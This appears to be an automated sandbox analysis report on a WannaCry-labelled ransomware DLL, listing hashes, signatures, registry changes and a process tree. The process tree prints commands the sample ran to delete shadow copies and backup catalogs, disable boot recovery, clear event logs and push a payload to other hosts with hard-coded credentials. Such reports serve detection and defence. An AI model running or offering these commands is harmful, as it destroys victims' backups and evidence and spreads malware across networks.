Overview
overview
10Static
static
10WannaCry/H...c1.dll
windows7_x64
1WannaCry/H...c1.dll
windows10_x64
1WannaCry/H...81.dll
windows7_x64
10WannaCry/H...81.dll
windows10_x64
10WannaCry/T...7f.dll
windows7_x64
10WannaCry/T...7f.dll
windows10_x64
10WannaCry/T...71.dll
windows7_x64
10WannaCry/T...71.dll
windows10_x64
10WannaCry/T...02.dll
windows7_x64
10WannaCry/T...02.dll
windows10_x64
10WannaCry/T...2f.dll
windows7_x64
10WannaCry/T...2f.dll
windows10_x64
10WannaCry/T...a6.dll
windows7_x64
10WannaCry/T...a6.dll
windows10_x64
10WannaCry/T...3f.dll
windows7_x64
10WannaCry/T...3f.dll
windows10_x64
10WannaCry/T...66.dll
windows7_x64
10WannaCry/T...66.dll
windows10_x64
10WannaCry/T...ba.dll
windows7_x64
10WannaCry/T...ba.dll
windows10_x64
10WannaCry/T...37.dll
windows7_x64
WannaCry/T...37.dll
windows10_x64
10WannaCry/T...10.dll
windows7_x64
10WannaCry/T...10.dll
windows10_x64
10WannaCry/T...f2.dll
windows7_x64
10WannaCry/T...f2.dll
windows10_x64
10WannaCry/T...af.dll
windows7_x64
10WannaCry/T...af.dll
windows10_x64
10WannaCry/T...40.dll
windows7_x64
10WannaCry/T...40.dll
windows10_x64
10WannaCry/T...81.dll
windows7_x64
10WannaCry/T...81.dll
windows10_x64
10Analysis
-
max time kernel
164s -
max time network
198s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:16
Static task
static1
Behavioral task
behavioral1
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win7v20201028
Behavioral task
behavioral4
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win10v20201028
Behavioral task
behavioral5
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win7v20201028
Behavioral task
behavioral6
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win10v20201028
Behavioral task
behavioral7
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win7v20201028
Behavioral task
behavioral12
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win10v20201028
Behavioral task
behavioral13
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win7v20201028
Behavioral task
behavioral14
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win7v20201028
Behavioral task
behavioral16
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win7v20201028
Behavioral task
behavioral18
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win10v20201028
Behavioral task
behavioral19
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win7v20201028
Behavioral task
behavioral20
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win7v20201028
Behavioral task
behavioral22
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win10v20201028
Behavioral task
behavioral25
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win7v20201028
Behavioral task
behavioral26
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win10v20201028
Behavioral task
behavioral27
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win7v20201028
Behavioral task
behavioral28
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win10v20201028
Behavioral task
behavioral29
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win7v20201028
Behavioral task
behavioral30
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win10v20201028
Behavioral task
behavioral31
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win7v20201028
Behavioral task
behavioral32
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win10v20201028
General
-
Target
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
-
Size
5.0MB
-
MD5
106e21fb736cb4e7a18a1746ef18e03f
-
SHA1
77a6da4aba3f6f0f8da2d5a5d646d295ca0fb088
-
SHA256
54d4b7ac7bafcf657cceb0ba8231d287065a1da82f9cc8dbf4077be950bf3d8e
-
SHA512
0056a56bb4a95743232034ea6db0fe692c43751c4854b1695cf82989be82c987e64fa48448cc07516409f3e50c0ae9c0b6ccefb37b504cc3f7a05334a5f6e7cb
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1240 bcdedit.exe 3848 bcdedit.exe -
Processes:
wbadmin.exepid process 3600 wbadmin.exe -
Executes dropped EXE 33 IoCs
Processes:
mssecsvc.exemssecsvc.exetasksche.exeseqwq.exe_rgs.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exepid process 2356 mssecsvc.exe 3156 mssecsvc.exe 2772 tasksche.exe 3592 seqwq.exe 3836 _rgs.exe 2184 _hvd.exe 3612 _hvd.exe 2188 _hvd.exe 4036 _hvd.exe 2128 _hvd.exe 4108 _hvd.exe 4168 _hvd.exe 4216 _hvd.exe 4264 _hvd.exe 4320 _hvd.exe 4392 _hvd.exe 4448 _hvd.exe 4508 _hvd.exe 4556 _hvd.exe 4604 _hvd.exe 4656 _hvd.exe 4704 _hvd.exe 4752 _hvd.exe 4800 _hvd.exe 4852 _hvd.exe 4900 _hvd.exe 4948 _hvd.exe 4996 _hvd.exe 5048 _hvd.exe 5092 _hvd.exe 4100 _hvd.exe 4156 _hvd.exe 4204 _hvd.exe -
Drops file in System32 directory 7 IoCs
Processes:
mssecsvc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mssecsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie mssecsvc.exe -
Drops file in Windows directory 2 IoCs
Processes:
rundll32.exemssecsvc.exedescription ioc process File created C:\WINDOWS\mssecsvc.exe rundll32.exe File created C:\WINDOWS\tasksche.exe mssecsvc.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1184 vssadmin.exe -
Modifies data under HKEY_USERS 66 IoCs
Processes:
_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exemssecsvc.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
seqwq.exepid process 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
_ftf.exeseqwq.exe_rgs.exevssvc.exewbengine.exe_hvd.exewevtutil.exedescription pid process Token: SeAssignPrimaryTokenPrivilege 2308 _ftf.exe Token: SeIncreaseQuotaPrivilege 2308 _ftf.exe Token: SeSecurityPrivilege 2308 _ftf.exe Token: SeTakeOwnershipPrivilege 2308 _ftf.exe Token: SeLoadDriverPrivilege 2308 _ftf.exe Token: SeSystemtimePrivilege 2308 _ftf.exe Token: SeBackupPrivilege 2308 _ftf.exe Token: SeRestorePrivilege 2308 _ftf.exe Token: SeShutdownPrivilege 2308 _ftf.exe Token: SeSystemEnvironmentPrivilege 2308 _ftf.exe Token: SeUndockPrivilege 2308 _ftf.exe Token: SeManageVolumePrivilege 2308 _ftf.exe Token: SeDebugPrivilege 3592 seqwq.exe Token: SeShutdownPrivilege 3836 _rgs.exe Token: SeBackupPrivilege 1840 vssvc.exe Token: SeRestorePrivilege 1840 vssvc.exe Token: SeAuditPrivilege 1840 vssvc.exe Token: SeBackupPrivilege 2800 wbengine.exe Token: SeRestorePrivilege 2800 wbengine.exe Token: SeSecurityPrivilege 2800 wbengine.exe Token: SeSecurityPrivilege 3612 _hvd.exe Token: SeBackupPrivilege 3612 _hvd.exe Token: SeSecurityPrivilege 2188 wevtutil.exe Token: SeBackupPrivilege 2188 wevtutil.exe -
Suspicious use of WriteProcessMemory 120 IoCs
Processes:
rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_rgs.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 2308 wrote to memory of 3592 2308 _ftf.exe seqwq.exe PID 2308 wrote to memory of 3592 2308 _ftf.exe seqwq.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 3836 wrote to memory of 2676 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 2676 3836 _rgs.exe cmd.exe PID 2676 wrote to memory of 1184 2676 cmd.exe vssadmin.exe PID 2676 wrote to memory of 1184 2676 cmd.exe vssadmin.exe PID 3836 wrote to memory of 3168 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 3168 3836 _rgs.exe cmd.exe PID 3168 wrote to memory of 3600 3168 cmd.exe wbadmin.exe PID 3168 wrote to memory of 3600 3168 cmd.exe wbadmin.exe PID 3836 wrote to memory of 2576 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 2576 3836 _rgs.exe cmd.exe PID 2576 wrote to memory of 1240 2576 cmd.exe bcdedit.exe PID 2576 wrote to memory of 1240 2576 cmd.exe bcdedit.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2576 wrote to memory of 3848 2576 cmd.exe bcdedit.exe PID 2576 wrote to memory of 3848 2576 cmd.exe bcdedit.exe PID 3836 wrote to memory of 68 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 68 3836 _rgs.exe cmd.exe PID 68 wrote to memory of 3612 68 cmd.exe wevtutil.exe PID 68 wrote to memory of 3612 68 cmd.exe wevtutil.exe PID 3836 wrote to memory of 1204 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 1204 3836 _rgs.exe cmd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 1204 wrote to memory of 2188 1204 cmd.exe wevtutil.exe PID 1204 wrote to memory of 2188 1204 cmd.exe wevtutil.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4320 2308 _ftf.exe _hvd.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#12⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\WINDOWS\tasksche.exeC:\WINDOWS\tasksche.exe /i4⤵
- Executes dropped EXE
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe -m security1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\_ftf.exe"_ftf.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\seqwq.exe123 \\.\pipe\95455C3A-74A0-4677-9708-B03F99818A373⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_rgs.exe"C:\Windows\TEMP\_rgs.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet5⤵
- Deletes backup catalog
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
